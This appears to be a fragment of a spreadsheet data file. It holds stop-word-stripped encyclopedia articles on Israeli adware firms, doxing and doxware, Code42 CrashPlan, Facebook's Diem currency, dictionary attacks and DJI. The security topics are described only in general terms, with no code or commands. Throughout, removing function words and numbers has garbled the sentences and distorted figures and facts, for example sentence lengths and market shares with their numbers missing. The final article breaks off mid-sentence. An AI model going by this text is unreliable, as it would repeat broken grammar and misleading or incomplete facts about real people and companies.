    <t>download valley cluster software companies israel, producing delivering adware installed alongside downloads software. primary purpose monetize shareware downloads. these software items commonly browser toolbars, adware, browser hijackers, spyware, malware. another group products download managers, possibly designed induce trick user install adware, downloading piece desired software mobile certain source. although term references silicon valley, refer specific valley geographical area. many companies located aviv surrounding region. used israeli media well reports related business.download managers download valley companies used major download portals software hosts, including download.com cnet, softonic.com sourceforge. economy smaller adware companies sweetpacks smilebox purchased larger company perion networks million million. ibario claimed worth $100 million early 2014. conduit valued $1.4 billion morgan 2012.revenues frequently near $100 million several $100 million large companies (perion: million 2013, conduit: claimed $500 million 2012), much lower operating income (perion: $3.88 million operating, $310.000 income 2013). numbers highly volatile, since technical legal preconditions quickly change profit opportunities. 2013 2014, changes browsers prevent unwanted toolbar installs policy microsoft towards advertising lead expectation main profit methods companies would soon work longer. perion stock lost roughly thirds value 2014, $13.25 january $4.53 december adware many products designed install solicited user downloads desired product, create revenue software usually distributed free. this, invasive harmful techniques. achieve installs, installers may: show information potentially harmful actions, hide fine print eulas, overlooked users expecting desired program. deceptive menus, suggesting adware main program part pretending show main program's eula, obtain "accept" click install unwanted software. request rights full system access, suggesting necessary main program's installation. install unwanted software without asking although user rejected install. hacks exploits unauthorized access confidential data system modifications.installed adware frequently attempts hide identity, prevent disabling, removal restoring previous settings, user's system browsing habits, download install further, unwanted software open backdoors possibly malicious attacks. many security software vendors list products category potentially unwanted programs (pup, also pua) grayware offer detection removal. this category distinct genuine malware used software companies can, opposed criminal underground programmers, threaten practice litigation. 2013, download valley company ibario accused, security software vendor trend micro, distributing sefnit/mevade malware installer related ukrainian company considered immediately responsible malware. security software circumvention unnamed download valley executive admitted wall street journal companies employ teams developers break security suites block software. companies linked term babylon (software), translation software, toolbars redirected search engines. conduit (company)/perion network mobile platform. conduit perion merged 2013. genieo innovation, user tracking software adware. installer used automated clicks bypass security permission dialogs. acquired somoto israel ltd. 2014. ibario, responsible installbrain downloader/installer accused spread sefnit/mevade malware (see above). ironsource, responsible installcore mobilecore download managers, well numerous adware products distributed them, funmoods foxtab. somoto similarweb, founded aviv 2007, acquired popular open-source browser extension stylish 2017 added spyware collected browsing history personal information million users, resulting extension removed blocked security risk google chrome mozilla firefox. superfish, advertising company ceased operating name 2015 controversy product pre-installed lenovo laptops, united states department homeland security advised uninstalling associated root certificate, made computers vulnerable serious cyberattacks. also adware browser hijacking freeware malware silicon wadi spamming spyware references</t>
  </si>
  <si>
    <t>Doxing</t>
  </si>
  <si>
    <t>doxing doxxing publicly revealing previously private personal information individual organization, usually internet. methods employed acquire information include searching publicly available databases social media websites (like facebook), hacking, social engineering. doxing carried reasons online shaming, extortion, vigilante enforcement. also associated hacktivism. etymology "doxing" neologism. originates spelling alteration abbreviation "docs" (for "documents") refers "compiling releasing dossier personal information someone". essentially, doxing revealing publicizing records individual, previously private difficult obtain. term derives slang "dropping dox," which, according contributor wired, honan, old-school revenge tactic emerged hacker culture 1990s". hackers operating outside used breach opponent's anonymity means expose opponents harassment legal repercussions.consequently, doxing often comes negative connotation means revenge violation privacy. history outside hacker communities, first prominent examples doxing took place internet discussion forums usenet late 1990s, including users circulating lists suspected neo-nazis. first documented doxing events publication "blacklist net.nazis sandlot bullies" listed names, email addresses, phone numbers, mailing addresses individuals author objected also late 1990s, website called nuremberg files launched, featuring home addresses abortion providers language implied website visitors stalk kill people listed.in 2012, then-gawker reporter adrian chen revealed identity reddit troll violentacrez michael brutsch, reddit users accused chen doxing brutsch declared "war" gawker. mid-2010s, events gamergate harassment campaign brought term wider public use. participants gamergate became known releasing sensitive information targets public, sometimes intent causing targets question physical harm. caroline sinders, research fellow center democracy technology, said "gamergate, people, mainstream culture, introduction doxxing is".according atlantic, 2014 2020, "the doxxing conversation dominated debate around whether unmasking pseudonymous person sizable following unnecessary dangerous invasion privacy." 2014, newsweek attempted search pseudonymous developer bitcoin, magazine accused doxing cryptocurrency enthusiasts. 2016, italian journalist attempted search identity pseudonymous italian novelist elena ferrante, journalist accused gendered harassment referred search "the doxxing elena ferrante." 2020, york times indicated planning publishing real name california psychiatrist running slate star codex blog, fans blog accused times doxing. person behind blog accused times threatening safety claimed started "major scandal" resulted times losing hundreds thousands subscriptions.in 2022, buzzfeed news reporter katie notopoulos used public business records identify previously pseudonymous founders bored yacht club. greg solano, founders club, claimed "got doxxed will".on april 2022, washington post reporter taylor lorenz revealed identity person behind twitter account libs tiktok chaya raichik, works real estate. this resulted raichik right-wingers accusing lorenz doxing.doxware cryptovirology attack invented adam young developed moti yung carries doxing extortion malware. first presented west point 2003. attack rooted game theory originally dubbed "non-zero-sum games survivable malware".the attack summarized book malicious cryptography follows: attack differs extortion attack following way. extortion attack, victim denied access valuable information back, attack presented victim retains access information disclosure discretion computer virus. doxware converse ransomware. ransomware attack (originally called cryptoviral extortion), malware encrypts victim's data demands payment provide needed decryption key. doxware cryptovirology attack, attacker malware steals victim's data threatens publish unless paid. common techniques once people exposed doxing, targeted harassment methods harassment in-person, fake signups mail pizza deliveries, swatting (dispatching armed police house spoofed tips).a hacker obtain individual's without making information public. hacker look information extort coerce known unknown target. hacker also harvest victim's information break internet accounts take social media accounts.victims also shown details proof doxed form intimidation. perpetrator fear gain power victims order extort coerce. doxing therefore standard tactic online harassment used people associated gamergate vaccine controversies. examples doxing abortion providers united states, 1970's 80's (paper) 1990's (digitally), anti-abortion activists secured abortion providers' personal information, home addresses, phone numbers, photographs, posted list. courts later ruled immediate incitement violence. site's legend explained: "black font (working); greyed-out name (wounded); strikethrough (fatality)." website included blood-dripping graphics, celebrated providers' deaths incited others kill injure remaining providers list. between 1993 2016, eight abortion providers killed anti-abortion activists, along least four police officers. human flesh search engine starting march 2006, chinese internet phenomenon "human flesh search engine"（人肉搜索）shares much common doxing. specifically, refers distributed, sometimes deliberately crowdsourced searches similar kinds information digital media. anonymous term "dox" entered mainstream public awareness media attention attracted anonymous, internet-based group hacktivists pranksters make frequent doxing, well related groups like antisec lulzsec. washington post described consequences innocent people incorrectly accused wrongdoing doxed "nightmarish".in december 2011, anonymous exposed detailed information 7,000 enforcement members response investigations hacking activities.in november 2014, anonymous began releasing identities members klux klan. this concerning local klan members ferguson, missouri, making threats shoot protesting shooting michael brown. anonymous also hijacked group's twitter page, causing klan members make veiled threats violence members anonymous. november 2015, major release information planned. discredited information released prematurely, anonymous denied involvement. november 2015 (guy fawkes night), anonymous released official list supposed, currently unverified, members sympathizers. boston marathon following april 2013 boston marathon bombing, internet vigilantes reddit wrongly identified number people suspects. notable among misidentified bombing suspects sunil tripathi, student reported missing bombings took place. body reported tripathi's found rhode island's providence river april 2013, reported rhode island health department. cause death immediately known, authorities said suspect foul play. family later confirmed tripathi's death result suicide. reddit general manager erik martin later issued apology behavior, criticizing "online witch hunts dangerous speculation" took place website. journalists journalists journal news westchester county, york accused doxing owners region story paper published december 2012.newsweek criticized writer leah mcgrath goodman claimed revealed identity anonymous creator bitcoin, satoshi nakamoto. although primarily drew public record, users reddit responded negatively.the satoshi nakamoto case brought doxing greater attention platforms twitter, users questioned ethics doxing journalism. many twitter users argued practice seemingly acceptable professional journalists wrong anyone else. other users discussed effect popularization concept doxing could journalism public interest, raising questions journalism concerning public private figures journalists practicing doxing blur line reporting information public's interest releasing information private life individual without consent.in september 2019, moines register published racist tweets made 24-year-old iowa whose beer sign espn college gameday resulted million contributions children's hospital. readers retaliated sharing social media comments previously made reporter, aaron calvin, contained racial slurs condemnation enforcement. newspaper later announced longer employed calvin. curt schilling march 2015, former major league baseball (mlb) pitcher curt schilling used doxing identify several people responsible "twitter troll" posts obscene, sexually explicit comments teenage daughter. person suspended community college, another lost part-time york yankees. alondra cano december 2015, minneapolis city council member alondra cano used twitter account publish private cellphone numbers e-mail addresses critics wrote involvement black lives matter rally. hipaa federal register 6039g health insurance portability accountability 1996 (hipaa) federal requires creation national standards protect sensitive patient health information disclosed without patient’s consent knowledge. embedded act, designed protect privacy patient, ironically provision requires internal revenue service (irs) publish names americans renounce relinquish citizenship. publish quarterly publication individuals have chosen expatriate, required section 6039g, fed. reg. 50058. expatriation provisions included “revenue offsets... avoid increasing budget deficit.” expressed intent originated expatriation 1995 bill archer publicly shame expatriating individuals. dobbs 2016, business news anchor dobbs revealed address phone number jessica leeds, women accused american presidential candidate donald trump inappropriate sexual advances; dobbs later apologized. erdoğan emails july 2016, wikileaks released 300,000 e-mails called erdoğan emails, initially thought damaging turkish president recep tayyip erdoğan. included leak michael best, uploaded turkish citizens' information databases wikileaks promoted, came forward mistake site uploaded information took down. files removed privacy concerns. they included spreadsheets private, sensitive information appears every female voter provinces turkey, including home addresses private information, sometimes including cellphone numbers. michael hirsh november 2016, politico editor michael hirsh resigned publishing home address white nationalist richard spencer facebook. u.s. presidential advisory commission election integrity july 2017, united states' presidential advisory commission election integrity, established 2017 u.s. president donald trump investigate controversial allegation voter fraud, published 112-page document unredacted emails public comment work, included critics supporters commission. commission included personal details critics, names, emails, phone numbers home addresses. most commenters wrote white house expressed concern publication personal information, person writing, release voter data period." despite this, person's name email address published commission.this drew criticism theresa lee, staff attorney american civil liberties union's voting rights project, stated, "this cavalier attitude toward public's personal information especially concerning given commission's request sensitive data every registered voter country." white house defended personal information publication, noting everyone warned might happen. however, former deputy secretary labor chris stated regardless legality, white house moral obligation protect sensitive data, saying, "whether legal disclose personal information, clearly improper, responsible white house would this."federal agencies often solicit release public comments proposed legislation. regulations.gov, designated public comments, includes detailed guidelines explaining submit comments, type personal information collected, information used, stating, "some agencies require include personal information, name email address, comment form. securities exchange commission, instance, warns commenters 'submit information wish make available publicly.'" another agency, federal trade commission, tells commenters "published comments include commenter's last name state/country well entire text comment. please include sensitive confidential information." however, white house appear issued public guidelines warnings many emails sent. marc lotter, press secretary mike pence, stated, "these public comments, similar individuals appearing commission make comments providing name making comments. commission’s federal register notice asking public comments website make clear information 'including names contact information' sent email address released." democratic u.s. house representatives intern october 2018, jackson cosko, house fellow democratic party, arrested u.s. capitol police (uscp). allegedly posted private, identifying information several senators wikipedia. according uscp, personal information republican senators lindsey graham, mike orrin hatch anonymously posted wikipedia week thursday september 2018. information included home addresses phone numbers. three lawmakers senate judiciary committee. alleged doxing occurred hearing supreme court nominee judge brett kavanaugh. cosko initially charged witness tampering, threats interstate communications, unauthorized access government computer, identity theft, second degree burglary unlawful entry. cosko fired arrest. worked democratic rep. sheila jackson (d-tx), sen. dianne feinstein (d-calif), sen. maggie hassan (d-n.h.), former sen. barbara boxer (d-calif). conviction charges might resulted cosko facing years prison. however, june 2019, sentenced judge thomas hogan four years prison. accomplice, samantha deforest davis, sentenced years supervised probation community service. legal remedies there currently legal remedies victims doxing. united states, currently federal laws could potentially address problem doxing: interstate communications statute interstate stalking statute. however, scholar argued, "[t]hese statutes...are woefully inadequate prevent doxing terms underinclusive rarely enforced". interstate communications statute, example, "only criminalizes explicit threats kidnap injure person". many instances doxing, doxer never convey explicit threat kidnap injure, victim could still good reason terrified. interstate stalking statute rarely enforced serves hollow protection online harassment". illustrate, three million people stalked internet year, three people charged interstate stalking statute. accordingly, "[t]his lack federal enforcement means states must step doxing reduced". anti-doxing services parallel rise doxing evolution cybersecurity, internet privacy, online privacy alliance, even companies provide anti-doxing services. most recently, high profile groups like university california berkeley made online guidance protecting community members doxing. wired published article dealing doxing, galperin, electronic frontier foundation, advises people "google yourself, lock down, make harder access information you." criminal mainland china from march 2020, people’s republic china’s "regulations ecological governance online information content" implemented, clarifying users producers online information content services platforms must engage online violence, doxing, deep forgery, data fraud, account manipulation illegal activities. hong kong 2021, criminal offense hong kong dox, doxing defined releasing private non-public information person purposes "threatening, intimidation, harassment cause psychological harm". persons convicted statute liable imprisonment years, fine hk$1,000,000 (us$128,324.40). south korea south korea stands countries criminal statute specifically addresses doxing. article "act promotion information communications network utilization, information protection" prohibits unlawful collection dissemination private information full name, birth date, address, likeliness, information deemed sufficient identify specific person(s) viewed summation, regardless intent. practice, however, ambiguous nature “unlawful collection” private information said statute, legal actions often based upon article act, prohibits insulting individual language derogatory profane, defamation individual dissemination either misinformation privileged factual information potentially damage individual's reputation honor (which often occurs doxing incident). important note particular clause enforces harsher maximum sentences “traditional” defamation statute existing korean criminal code originally enacted partially response rise celebrity suicides cyberbullying. netherlands 2021, increasing doxing incidents targeting dutch activists, politicians, journalists others, doxing proposed minister justice security ferdinand grapperhaus. aimed curtailing share private information intent intimidation, carries maximum penalty one-year prison sentence. also data re-identification doxbin escrache identity theft anyone kiwi farms opposition research outing quarterly publication individuals have chosen expatriate skiptracing references sources external links dictionary definition wiktionary</t>
  </si>
  <si>
    <t>CrashPlan</t>
  </si>
  <si>
    <t>code42 american cybersecurity software company based minneapolis specializing insider risk management. maker cloud-native data protection products incydr crashplan. code42’s incydr saas data-loss protection product. incydr designed help enterprise security teams detect insider risks data could lead data leak data loss insider threat breaches, respond appropriately. code42’s crashplan small business cloud data backup recovery software. history code42 founded consulting company 2001, matthew dornquast, brian bispala, mitch coopet. company's name honors douglas adams, authored hitchhiker’s guide galaxy died year. book, number "answer ultimate question life, universe everything".some code42's first projects included redesign country airlines’ website 2002, project retailer target corporation, ticket booking engine midwest airlines. income services business used fund product ideas years.in 2006, company planned create facebook-like desktop application, project became large impractical. code42 focused online storage element application, creating crashplan 2007.in june 2011, code42 acquired minneapolis-based mobile development company, recursive awesome llc, support software mobile devices.in 2012, code42 raised $52.5 million funding. funding first distribution $100 million pool established 2011 accel partners fund data companies.in 2015, former eloqua payne succeeded co-founder matthew dornquast ceo. company raised additional million funding october 2015.on august 2017, code42 announced shutting crashplan home, effective october 2018. they accepting subscriptions would maintain existing subscriptions existing subscription period, point backups would purged. home plans replaced crashplan small business, business-focused, although still possible private purposes. backups friends/family supported product, company explained: shift business strategy focus exclusively enterprise small business segments, great options continue getting best backup solution.".in september 2020, code42 launched incydr data risk detection response product, saas data protection tool enterprises. incydr allows security teams effectively mitigate file exposure exfiltration risks without disrupting legitimate work collaboration. incydr guards intellectual property, source code trade secrets. incydr code42’s flagship product.also september 2020, code42 leaders payne, jadee hanson, mark wojtasiak, co-authored published book inside jobs: insider risk biggest cyber threat can’t ignore. book explores problem insider risk, drives believe traditional methods protecting company data inadequate security leaders keep data secure. business april 2011, code42 software’s revenue comes business customers. most remainder comes consumers small portion service provider partners. reported 2012 code42 profitable year since founded. grew $1.4 million revenue 2008 $11.46 million 2010 $18.5 million 2011. 2020, code42's saas business $100 million annually. 2012, company backed petabytes data processed billion files day. products services code42 maker incydr data loss detection response product. allows security teams mitigate file exposure exfiltration risks without disrupting collaboration. incydr comes plans: basic advanced.incydr displays information data relevant, including how, data moving, moving monitors creation, deletion, modification movement files, whether activity within company’s security protocols not. even though incydr monitors file activity, distinguishes acceptable team collaboration file sharing events represent risks businesses.code42 also maker cloud backup recovery software crashplan small business. crashplan backs data remote servers hard drives. available mac, windows linux. 2018, backup computers longer supported.initial backups take several hours days internet, depending amount data bandwidth available, afterwards, continuous incremental backups conducted without user intervention.around 2012, used paid option seed loading, hard drive sent user, faster local backup could performed drive could shipped back code42 initial backup. however seeded backup service longer offered 2016; neither corresponding restore-to-door service, would allow hard drive containing extensive restore data backups shipped back user faster over-the-internet download.with crashplan, data encrypted, password-protected stored proprietary format. there also option secure private key. corporate users 2012 crashplan proe back private servers instead code42's data centers four five cases. 2012, software option create private on-site backup server.in 2013, code42 developed, released marketed file sharing service called shareplan. according star tribune, competed dropbox, shareplan used access files track users.in october 2014, revision software added features regulatory compliance like sarbanes-oxley options private, public hybrid cloud deployment. single login crashplan using feature called "code42 edge platform", improved december 2014 two-factor authentication features. shareplan discontinued august 2015.in comparative review published 2015 wall street journal, geoffrey fowler observed crashplan favorite four services evaluated. observed lacked "fine print", whereas services charged additional fees basic features really unlimited. magazine 2017 gave crashplan stars awarded editor's choice. review praised user interface, local backup options, security features, said mobile explorer-based features "limited."a 2012 product review macworld gave crashplan rating gartner, 2012, gave enterprise version, crashplan proe, "excellent" rating. things digital praised crashplan operating system support configuration options. also 2012, technica said crashplan better features pricing options competitors. also comparison online backup services references external links official website crashplan website</t>
  </si>
  <si>
    <t>Diem (digital currency)</t>
  </si>
  <si>
    <t>diem (formerly known libra) permissioned blockchain-based stablecoin payment system proposed american social media company meta platforms. plan also includes private currency implemented cryptocurrency. launch originally planned 2020, rudimentary experimental code released project abandoned january 2022.the project, currency transactions would managed cryptographically entrusted diem association, membership organization companies payment, technology, telecommunication, online marketplace venture capital, nonprofits. before december 2020, project called "libra", although changed diem following legal challenges regarding name logo.in general, project generated backlash government regulators european union, usa, countries, among general public monetary sovereignty, financial stability, privacy, antitrust concerns ultimately helped kill project. history morgan beller started working cryptocurrency blockchain meta 2017, initially person working meta's blockchain initiative.meta vice president david marcus moved facebook messenger blockchain division 2018. first reports facebook planning cryptocurrency, marcus charge, emerged days later. february 2019, engineers working project. confirmation facebook intended cryptocurrency first emerged 2019. time known "globalcoin" "facebook coin".the project formally announced june 2019, name libra. creators coin listed morgan beller, david marcus kevin weil (novi's product). first release planned 2020.on july 2019, facebook announced currency launch regulatory concerns libra "appropriate approvals". september 2019, meeting senate democratic leaders, mark zuckerberg said libra would launched anywhere world without first obtaining approval united states regulators. october 2019 multiple companies left libra association: paypal left october, ebay, mastercard, stripe, visa mercado pago followed october, booking holdings october.according november 2020 report financial times, libra launching slimmed plan includes cryptocurrency stablecoin backed dollar rather multiple currency collection. newspaper also reported cryptocurrency called diem, latin "day". december 2020, libra rebranded diem, libra association renamed diem association. december 2020, diem association members.in january 2022, reported diem association winding down, diem’s assets california based silvergate capital reported $200 million. facebook also reported planned launch token u.s. issued slivergate although federal reserve united states department treasury supportive project. currency plan libra token backed financial assets basket currencies, treasury securities attempt avoid volatility. facebook announced partners inject initial us$10 million, libra full asset backing opens. january 2020, libra said dropped idea mixed currency basket favor individual stablecoins pegged individual currencies.libra service partners, within libra association, create libra currency units based demand. libra currency units retired redeemed conventional currency. initial reconciliation transactions performed service partner, blockchain's distributed ledger used reconciliation service partners. intent help prevent everyone members libra association trying extract analyze data distributed ledger. contrast cryptocurrencies bitcoin permissionless blockchains, libra decentralized, relying trust libra association facto central bank".in september 2019, facebook announced reserve basket would made united states dollar, euro, japanese yen, pound sterling singapore dollar.libra considered using coins based individual national currencies network, alongside basket-based libra token. this first mooted publicly david marcus october 2019, mark zuckerberg october 2019 senate testimony. idea promoted march 2020.on april 2020, libra announced plans create infrastructure multiple cryptocurrencies, preponderance backed individual fiat currencies, said association talks regulators switzerland payments license.in 2021, diem announced withdrawn application swiss financial market supervisory authority said would instead seek approval treasury register money services business. diem association facebook established libra association (later renamed diem association) oversee currency, founded geneva, switzerland. december 2020, diem association includes: payments: payu checkout.com technology marketplaces: facebook's subsidiary novi financial, farfetch, lyft, spotify, uber, shopify telecommunications: iliad blockchain: anchorage, bison trails, coinbase, xapo venture capital: andreessen horowitz, breakthrough initiatives, ribbit capital, thrive capital, union square ventures, slow ventures, temasek holdings nonprofit multilateral organizations, academic institutions: creative destruction lab, kiva, mercy corps, women's world banking, heifer internationalseven companies named libra association members initial june 2019 announcement, left first libra meeting october 2019: booking holdings, ebay, mastercard, mercado pago, paypal, stripe visa inc. visa chairman alfred kelly clarified july visa joined, signed nonbinding letter intent; officially joined." said factors determining whether visa would, fact, join included "the ability association satisfy requisite regulatory requirements." vodafone joined association october 2019, left january 2020, saying preferred work mobile banking subsidiary m-pesa.press coverage around initial libra announcement noted absence apple pay, google pay, amazon banks. banking executives reluctant join uncertainties surrounding regulation feasibility scheme.in late february 2020, e-commerce site shopify cryptocurrency brokerage tagomi joined. association hopes grow members equal vote.in late april 2020, payment processing company, checkout.com, announced would joining association. 2020, singapore state investor temasek holdings, cryptocurrency investor paradigm private equity firm slow ventures announced would join association.libra association renamed diem association december 2020, part rebranding libra diem. reception project faced criticism opposition central banks. cryptocurrency blockchain implementation questioned. european union regulatory response first regulator response libra came within minutes launch announcement, french finance minister, bruno maire, interviewed french radio station europe said libra could allowed become sovereign currency, would require strong consumer protections.le maire warned french parliament concerns libra privacy, money laundering terrorism finance. called central bank governors group seven prepare report facebook's plans.bank england governor mark carney said need keep "open mind" technology money transfers, "anything works world become instantly systemic subject highest standards regulation."german markus ferber warned facebook could become shadow bank. colleague stefan berger sees libra's power potential threat economic stability euro zone democracies: libra could make facebook central bank. berger argues favor development european stablecoin order able offer secure alternative facebook currency. berger charge european report markets crypto-assets (mica) serve base regulatory framework crypto-assets.on september 2019, maire stated france would allow development libra european union, would threat monetary sovereignty states. also spoke potential abuse marketing dominance systemic financial risks reasons allowing stablecoins operate within eu.according reuters report, german finance minister olaf scholz said following video conference finance ministers germany europe cannot accept diem currency entry market regulatory risks adequately addressed. scholz stated support private-sector digital currencies, remarks could detrimental diem jpmorgan coin. valdis dombrovskis, executive vice-president european commission economy works people, stated digital finance outreach 2020 closing conference european union preparing cryptocurrency regime include stricter requirements "global stablecoin" projects like libra. addition, dombrovskis stated address stablecoins function global scale "present concerns" disturb financial monetary stability. united states regulatory response regulators politicians expressed concerns within hours mid-2019 announcement. maxine waters, chairperson united states house committee financial services committee asked facebook halt development launch libra, citing list recent scandals "the cryptocurrency market currently lacks clear regulatory framework". u.s. house committee financial services democrats sent letter facebook asking company stop development libra, citing concerns privacy, national security, trading, monetary policy.jerome powell, chairman federal reserve, testified congress july 2019 "serious concerns" libra would deal "money laundering, consumer protection financial stability."president donald trump tweeted july 2019 facebook companies want become bank, must seek banking charter become subject banking regulations."us regulators contacted visa, paypal, mastercard stripe, asking complete overview libra would anti-money-laundering compliance programs.since several participants left project late 2019, libra association working address concerns united states regulators development "libra 2.0" blueprint.according cnbc, 2021, diem reportedly withdrawn application swiss payment license, intending instead move activities united states. diem announced would relocate operating headquarters geneva washington intend establish payment system united states. other countries swiss federal data protection information commissioner, david marcus told senate would oversee privacy libra, said heard facebook all.the government japan begun process investigating libra analysis effect japan's monetary policy financial regulation. july 2019, japanese officials formed working committee, consisting bank japan, ministry finance financial services agency, coordinate policies address libra's impact regulation, monetary policy, tax, payments settlement. working group coordinate measures handle libra's influence regulation, monetary policy, tax, payments settlement. this done group seven meeting france august 2019.data protection regulators internationally issued statement asking facebook protect personal data users, detail libra's planned practices handling personal data, light "previous episodes facebook’s handling people’s information expectations regulators, users."finance watch describes libra "huge risk public monetary sovereignty" "concludes libra idea users, stability financial system, last least democracy."on september 2019, officials libra consortium, including j.p. morgan facebook, officials central banks, including federal reserve bank england, basel, switzerland meeting chaired european central bank board member benoît cœuré, vocal libra critic. privacy concerns industry observers speculated whether libra provide meaningful privacy users. facebook's plan subsidiary novi financial manage libra facebook users, facebook executives stated novi share account holder's purchase information facebook without authorization. however, system also planned include friend-finder search function, function constitute permission novi combine account holder's transaction history facebook account.in august 2019, according cnbc, data protection officials including democratic commissioner rohit chopra, u.k. information commissioner elizabeth denham, data protection supervisor giovanni buttarelli, regulators australia, canada, albania, burkina faso joint statement expressed doubts facebook's proposed digital currency project libra (diem). according cnbc, facebook confirmed governments regulators throughout world scrutinizing libra.in general, consumer advocates public interest groups opposed diem privacy grounds rejected tethering financial services mass surveillance. antitrust concerns scholars highlighted several antitrust risks associated diem, namely, risk collusion association members, risk tying diem novi, risk exclusivity agreements novi required diem within facebook environment. fake libra websites facebook tries police inaccurate information fake libra websites platform. according washington post, nearly dozen fake accounts, pages, groups facebook instagram advertised legitimate centres libra digital currency, cases trying sell discounted libra accessible. numerous counterfeits used facebook logo, images facebook mark zuckerberg, libra's official marketing material. growth fake pages groups devoted libra added facebook's difficulties global authorities. legal issues diem association (formerly libra association) faces legal challenges name logo digital currency already within different territories. finco services filed lawsuit york southern district court facebook, inc., novi financial, inc., jlv, character alleged trademark infringement arising latter logo similar start-up bank operated finco services, inc. plaintiff requested preliminary permanent injunctive relief well monetary relief defendants. settlement conference matter scheduled march 2020 united states courthouse, parties consent conducting proceedings magistrate judge requested tried jury.in europe, libra association filed application european union intellectual property office registration word “libra” verbal trademark. proceeding already received five oppositions registration four european companies based mainly alleged likelihood confusion prior trademarks. opposing companies lyra network, libra internet bank, libri gmbh advanced technologies co., ltd. april 2020, parties reach adversarial part opposition proceedings, unless settlement reached cooling-off period. implementation blockchain consensus diem rely cryptocurrency mining. only members diem association able process transactions permissioned blockchain. diem hopes begin transitioning permissionless proof-of-stake system within five years; although materials admit solution exists "that deliver scale, stability, security needed support billions people transactions across globe permissionless network." software diem source code written rust published open source apache license github. june 2019, elaine opinion writer bloomberg news, tried compiling running publicly released code libra. time, software little allow fake coins wallet; almost none functionality outlined white paper implemented, including "major architectural features invented." surprised facebook "would release software state". digital wallet june 2019, facebook announced plans release digital wallet called calibra 2020, standalone also integrate within messenger whatsapp. 2020, calibra renamed novi. february 2021, novi diem released release date. move move diem blockchain's proposed smart contract custom transactions language. planned statically-typed programming language, compiled bytecode. move language syntax released yet. example intermediate representation language shown move white paper: also beenz earlier attempt internet-wide digital currency facebook credits flooz earlier attempt internet-wide digital currency bitcoin cryptocurrency today largest market capitalization list online payment service providers references external links official website</t>
  </si>
  <si>
    <t>Dictionary attack</t>
  </si>
  <si>
    <t>cryptanalysis computer security, dictionary attack attack using restricted subset keyspace defeat cipher authentication mechanism trying determine decryption passphrase, sometimes trying thousands millions likely possibilities often obtained lists past security breaches. technique dictionary attack based trying strings pre-arranged listing. such attacks originally used words found dictionary (hence phrase dictionary attack); however, much larger lists available open internet containing hundreds millions passwords recovered past data breaches. there also cracking software lists produce common variations, substituting numbers similar-looking letters. dictionary attack tries possibilities deemed likely succeed. dictionary attacks often succeed many people tendency choose short passwords ordinary words common passwords; variants obtained, example, appending digit punctuation character. dictionary attacks often successful, since many commonly used password creation techniques covered available lists, combined cracking software pattern generation. safer approach randomly generate long password letters more) multiword passphrase, using password manager program manually typing password. pre-computed dictionary attack/rainbow table attack possible achieve time–space tradeoff pre-computing list hashes dictionary words storing database using hash key. this requires considerable amount preparation time, allows actual attack executed faster. storage requirements pre-computed tables major cost, less issue cost disk storage. pre-computed dictionary attacks particularly effective large number passwords cracked. pre-computed dictionary needs generated once, completed, password hashes looked almost instantly time find corresponding password. refined approach involves rainbow tables, reduce storage requirements cost slightly longer lookup-times. hash example authentication system compromised attack. pre-computed dictionary attacks, "rainbow table attacks", thwarted salt, technique forces hash dictionary recomputed password sought, making precomputation infeasible, provided number possible salt values large enough. dictionary attack software cain abel crack aircrack-ng john ripper l0phtcrack metasploit project ophcrack cryptool also brute-force attack e-mail address harvesting intercontinental dictionary series, online linguistic database derivation function stretching password cracking password strength references external links 2828 internet security glossary 4949 internet security glossary, version secret service distributed dictionary attack suspect's password protecting encryption keys testing brute force (owasp-at-004)</t>
  </si>
  <si>
    <t>DJI</t>
  </si>
  <si>
    <t>technology co., ltd. shenzhen sciences technologies ltd. (chinese: 深圳大疆创新科技有限公司; pinyin: shēnzhèn jiāng chuàngxīn kējì yǒuxiàn gōngsī) full, popularly known trade name dji, stands da-jiang innovations (大疆创新; jiāng chuàngxīn; 'great frontier innovations'), chinese technology company headquartered shenzhen, guangdong, manufacturing facilities throughout world. manufactures commercial unmanned aerial vehicles (drones) aerial photography videography. also designs manufactures camera gimbals, action cameras, camera stabilizers, flight platforms, propulsion systems flight control systems. accounts around world's consumer drone market march 2020. camera drone technology widely used music, television film industries. company's products also used militaries police forces, well terrorist groups, company taking steps limit access latter.us government institutions prohibited internal products, 2020, various agencies local federal level continued products. december 2021, united states department treasury prohibited investment u.s. individuals entities, accusing company complicity aiding uyghur genocide. history company founded 2006 frank wang (wāng tāo, 汪滔). born hangzhou, zhejiang, enrolled college student hong kong university science technology (hkust) 2003. part hkust team participating robocon third prize.wang built first prototypes dji's projects dorm room, selling flight control components universities chinese electric companies. used proceeds move industrial shenzhen hired small number staff 2006. company struggled first, high degree churn among employees attributed wang's abrasive personality perfectionist expectations employees. company sold modest amount components period, relying well financial support wang's family friend, provided us$90,000 managed company's finances. 2009, dji's components allowed team successfully pilot drone around peak everest.in 2010, wang hired high school friend, swift jia, company's marketing. began cater drone hobbyists markets outside china. 2011, wang colin guinn trade show, founded north america, subsidiary company focusing mass market drone sales. 2013, released first model phantom drone, entry-level drone user-friendly drones market time. phantom commercially successful, conflict guinn wang. midway year, wang made offer guinn out, guinn refused. year, locked employees north american subsidiary email accounts well shutting subsidiary's operations. guinn sued dji, case settled court.in 2015, eclipsed success phantom release phantom whose even greater popularity part addition built live-streaming camera. largest consumer drone company world, driving many competitors market following years. 2015 also marked beginning dji's robomaster robotics competition (机甲大师赛), annual international collegiate robot combat tournament held shenzhen sports centre.in november 2015, announced establishment strategic partnership hasselblad. january 2019, acquired majority stake hasselblad.in 2017, technology engineering emmy award camera drone technology, used filming various television shows including amazing race, american ninja warrior, better call saul game thrones. that year, wang became asia's youngest tech billionaire, world's first drone billionaire.also 2017, signed strategic cooperation agreement provide surveillance drones chinese police xinjiang.on june 2018, police body taser maker axon announced partnership sell surveillance drones u.s. police departments. 2020, products also widely used u.s. police fire departments.on january 2019, announced internal probe uncovered "extensive" fraud certain employees "inflated costs parts materials certain products personal financial gain." estimated cost fraud cn¥1 billion" (us$147 million), maintained company "did incur full year loss 2018."in january 2020, united states department interior announced would grounding around drones, using wildlife conservation infrastructure monitoring purposes. march 2020, holds nearly market share consumer drones, company holding 4%.in 2020, drones used many countries around world combat coronavirus. china, drones used police force remind people wear masks. countries, morocco saudi arabia, drones used disinfect urban areas monitor human temperatures order contain spread coronavirus. corporation structure infrastructure 2018, raised roughly billion funds preparation envisioned hong kong stock exchange. july 2020, rumors persisted indication forthcoming. company previously raised $500 million 2015 funding round investors including china life insurance ltd, gic, horizon capital, latter co-founded china's former premier minister jiabao.dji counts roughly 14,000 employees offices internationally. company known difficult hiring process, well extremely competitive internal culture, teams often pitted design better products.dji's factories shenzhen include highly 